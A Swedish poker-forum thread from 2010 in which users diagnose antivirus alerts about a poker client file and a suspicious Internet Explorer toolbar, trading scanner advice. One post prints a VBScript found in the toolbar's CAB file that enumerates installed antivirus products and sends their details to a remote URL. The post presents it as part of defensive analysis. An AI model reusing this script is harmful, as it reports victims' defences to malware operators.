P3zz Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Satt och lirade och skulle trycka upp "cashiern" på Diamondbet då det i samma stund poppade upp en varning från AVG Internet Security om malware detection. Filen som påstods vara infekterad heter browser.exe och den togs bort på några sekunder efter att den hamnat i karantän. Har inte tidigare på 1,5 år fått någon varning ens om liknande. Använder AVG internet security med senaste updates, surfar inte på datorn och har endast pokerprogram installerade dvs inget msn eller dylikt. Bör jag vara orolig? prinstcreen på "details" från AVG kan ses på http://www.megafileupload.com/en/file/259748/IMG-0415-JPG.html Citera
Amutu Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Lägg upp bild på annan sajt som imageshack. Då jag helst inte vill ladda ner ngn fil Det är en malware fil. Så din dator var infekterad men om du nu tog bort den så är det löst. Jag skulle dock råda dig att ladda ner SuperAntiSpyware (Finns som gratis version) Och uppdatera den till senaste version och sen göra en scan. Sen råder jag dig att skaffa ett annat Anitvirus än AVG då AVG inte är en av dom bästa eller ens i närheten av de bästa. Avira , Avast, Nod32 , Kaspersky, Northon är några som är betydligt bättre. Citera
Joeduck Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Har inte heller laddat ner filen, finns bättre ställen att hosta bilder på. Tinypic.com 2shared.com imageshack.com .. Iaf så tror jag det är ett false-alert. Browser.exe känns troligen igen som malware eftersom den använda IE funktioner för att ha en inbyggd webbläsare, en funktion som många malware använder sig av. Dock inte säkert att det är hellugnt för det, men väldigt troligt. Jag skulle inte räknat datorn som oinfekterad ifall det är så att vi ska räkna att den vart infekterad nu, så blir den inte ren bara för att du tar bort en infekterad fil (browser.exe). Jag kan nästan garantera att ifall ett "virus" ville ha dina kontouppgifter så skulle det inte infektera denna .exe fil. Själv skulle jag testat att ominstallera pokerprogrammet sen ifall det säger samma så uppdaterat databasen för AV't. Gratisantivirus brukar ta lite längre tid på sig att uppdatera sina databaser än andra. T.ex autohotkey har så vitt jag vet alltid detekteras som ett virus av AVG, när det gäller kommersiella program så är de snabbare att lägga dem på exklusion-list. Det är så gott som osannolikt att AVG ska vara först att detektera ett unikt virus som gömt sig i en pokerklient och som har kommit förbi klientens egna säkerhetsprocedurer samt att inga andra filer skulle tillhöra detta viruset. Och att det skett precis vid en uppdatering av databasen.. Nej, mest troligt att varningen försvinner om några dagar eller vecka. Sen råder jag dig att skaffa ett annat Anitvirus än AVG då AVG inte är en av dom bästa eller ens i närheten av de bästa. Avira , Avast, Nod32 , Kaspersky, Northon är några som är betydligt bättre.+1 Citera
Snygglenn Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Har fått upp det här från nod32 hur många gånger som helst senaste dagarna, googlade på det och verkar inte vara något farligt men hur fan får jag bort skiten? Citera
Joeduck Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 File Name jobexe-877102-wl-cabDetections: 9 / 16 (56 %) http://vscan.urlvoid.com/analysis/a659897e438733ff99457614926d0f7e/am9iZXhlLTg3NzEwMi13bC1jYWI=/ Gissar att det är ett BHO till IE. Finns "BHO removers" om du söker på google men jag skulle hellre laddat ner autoruns från sysinternals och sökt efter det där, eftersom jag inte har en aning om vilket program som är bra dvs. Sen att det ofta kan bli fel om man är inne i autoruns programmet och pillar på sånt man inte har en aning om vad det är, är ett senare problem.. Det går iaf att spara inställningarna så det är det första man ska göra. Sen starta i felsäkert läge och åsterställ om du inte kommer in i windows. http://technet.microsoft.com/en-us/sysinternals/default.aspx *edit, hittade info om trojanen: Kolla om det är något du känner igen, får väl hålla tummarna för att det inte är något. http://www.pcthreat.com/parasitebyid-8682en.html Citera
Snygglenn Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 http://vscan.urlvoid.com/analysis/a659897e438733ff99457614926d0f7e/am9iZXhlLTg3NzEwMi13bC1jYWI=/ Gissar att det är ett BHO till IE. Finns "BHO removers" om du söker på google men jag skulle hellre laddat ner autoruns från sysinternals och sökt efter det där, eftersom jag inte har en aning om vilket program som är bra dvs. Sen att det ofta kan bli fel om man är inne i autoruns programmet och pillar på sånt man inte har en aning om vad det är, är ett senare problem.. Det går iaf att spara inställningarna så det är det första man ska göra. Sen starta i felsäkert läge och åsterställ om du inte kommer in i windows. http://technet.microsoft.com/en-us/sysinternals/default.aspx *edit, hittade info om trojanen: Kolla om det är något du känner igen, får väl hålla tummarna för att det inte är något. http://www.pcthreat.com/parasitebyid-8682en.html Ty, installerade malwarebytes' anti-malware och den tog bort filen men jag vet inte om den var ondsint eller inte? Citera
Joeduck Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Ty, installerade malwarebytes' anti-malware och den tog bort filen men jag vet inte om den var ondsint eller inte? Svårt att veta.. Du kan ju öppna CAB-filen med förslagsvis winrar, kolla vad som finns där och jämföra med infon från pcthreat-länken. Skulle tro att det finns fler saker som är infekterade än just den, eftersom NOD har varnat för en URL som du inte känner igen, så tyder det på att något händer i bakgrunden. *edit: kollade själv, verkar hyffsat suspekt. Har ingen direkt kunskap om BHO's men kollade programmen som fanns i filen och så har jag svårt att se legitima program köras. En dll fil som har en gömd exe fil, som är inkluderad i en annan exe fil t.ex.. Det kan oxå vara en sketen toolbar som inte gör något särskilt mer än lägger till oönskade funktioner, men vet du inte vad det är så är det onödigt att ha den kvar imo, och sen är det ett fint ställe för trojaner att gömma sig på. Postar länk till en bild som fanns i en av filerna, kallas tydligen "tango toolbar". http://dc174.2shared.com/img/15737863/c95a7819/Data_1.gif Ladda hem dds.scr så ser du vilka BHO's som är installerade bla. Citera
Joeduck Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Ändrar mig, det är med 99.9% säkerhet något du inte vill ha att göra med. Följande script hittade jag i en av filerna som fanns i CAB filen: Function URLEncode(str) str = Replace(str, "%", "%25") str = Replace(str, "/", "%2F") str = Replace(str, "|", "%7C") str = Replace(str, "?", "%3F") str = Replace(str, "!", "%21") str = Replace(str, "@", "%40") str = Replace(str, "\", "%5C") str = Replace(str, "#", "%23") str = Replace(str, "$", "%24") str = Replace(str, "^", "%5E") str = Replace(str, "&", "%26") str = Replace(str, "*", "%2A") str = Replace(str, "(", "%28") str = Replace(str, ")", "%29") str = Replace(str, "}", "%7D") str = Replace(str, ":", "%3A") str = Replace(str, ",", "%2C") str = Replace(str, "{", "%7B") str = Replace(str, "+", "%2B") str = Replace(str, ".", "%2E") str = Replace(str, "-", "%2D") str = Replace(str, "~", "%7E") str = Replace(str, "-", "%2D") str = Replace(str, "[", "%5B") str = Replace(str, "_", "%5F") str = Replace(str, "]", "%5D") str = Replace(str, "`", "%60") str = Replace(str, "=", "%3D") str = Replace(str, "'", "%27") str = Replace(str, " ", "+") str = Replace(str, Chr(34), "%22") URLEncode = str End Function Dim urlbase urlbase = WScript.Arguments(0) strComputer = "." Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\SecurityCenter") Set colItems = objWMIService.ExecQuery("Select * from AntiVirusProduct") Dim url Dim bHasAV Dim o bHasAV = FALSE For Each objItem in colItems bHasAV = TRUE 'Wscript.Echo "Company Name: " & objItem.companyName 'Wscript.Echo "Display Name: " & objItem.displayName 'Wscript.Echo "Version Number: " & objItem.versionNumber 'Wscript.Echo "Instance GUID: " & objItem.instanceGuid 'Wscript.Echo "Product Upto Date: " & objItem.productUptoDate url = urlbase & "companyName=" & URLEncode(objItem.companyName) & "&displayName=" & URLEncode(objItem.displayName) & "&versionNumber=" & URLEncode(objItem.versionNumber) 'Wscript.Echo "Url: " & url Set o = CreateObject("MSXML2.XMLHTTP") o.open "GET", url, False o.send Next IF NOT bHasAV THEN url = urlbase & "companyName=None&displayName=None&&versionNumber=None" 'Wscript.Echo "Url: " & url Set o = CreateObject("MSXML2.XMLHTTP") o.open "GET", url, False o.send END IF Citera
Snygglenn Postad 16 Augusti , 2010 Rapport Postad 16 Augusti , 2010 Ändrar mig, det är med 99.9% säkerhet något du inte vill ha att göra med.Följande script hittade jag i en av filerna som fanns i CAB filen: Otroligt tacksam för all hjälp. Förstår inget av det där men tror filen är borta. Byta alla lösenord? Citera
Snygglenn Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 Ladda hem dds.scr så ser du vilka BHO's som är installerade bla. "This tool does not your support your operating system" Citera
Joeduck Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 Otroligt tacksam för all hjälp. Förstår inget av det där men tror filen är borta. Byta alla lösenord?Ja, det skadar väl knappast. Man ska helst byta ett par ggr/år minst sägs det.. Kanske inte det bästa att göra ifrån en misstänkt infekterad dator iofs, onödigt att skriva in lösenord på nytt då. Scriptet som jag postade försöker troligen installera ett sk. fejk-antivirus och de är extremt jobbiga att få bort. De i sin tur installerar ofta all möjligt skit också.. Mycket möjligt iaf att du inte har hunnit bli infekterad. Missade att BHO'n vart installerad redan men NOD32 blockerade den för att köras, så det är ju bra. Lite skumt att det inte gavs något alternativ för att radera den. Du har troligen fått in den när du surfat. Rekommenderar att byta webbläsare. Varför använder du internet explorer? Själv använder jag oftast Opera, dels eftersom det är så få andra som gör det = bättre för mig. Kör jag IE så virtualiserar jag, värre virusklister finns inte. Citera
Joeduck Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 "This tool does not your support your operating system"W7? Är nog inte nödvändigt om MBAM hittade pesten ändå. Hijackthis är bra med. Citera
Snygglenn Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 Rekommenderar att byta webbläsare. Varför använder du internet explorer? Själv använder jag oftast Opera, dels eftersom det är så få andra som gör det = bättre för mig. Kör jag IE så virtualiserar jag, värre virusklister finns inte. Jag använder ju inte ens ie? Kör firefox Citera
Amutu Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 Tanka detta program Snygglen och kör det minst en gång i veckan. SuperAntiSpyware Mkt effektivit program. För att ta bort sånt skit. Tipsade i min dagbok om Maxthon 3.0 men gör det här med. Sjukt bra browser och den bästa av dom alla i tester. Snabbare browser än Maxthon finns inte. Den har allt det man vill ha oxå. Kan bara reka. Citera
Joeduck Postad 17 Augusti , 2010 Rapport Postad 17 Augusti , 2010 Jag använder ju inte ens ie? Kör firefox Oki, skumt eftersom det är en toolbar till IE, borde inte kunnas installeras på FF.. Använder du no-script eller dylikt med? Kanske kommit in någon annan väg iofs. Citera
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.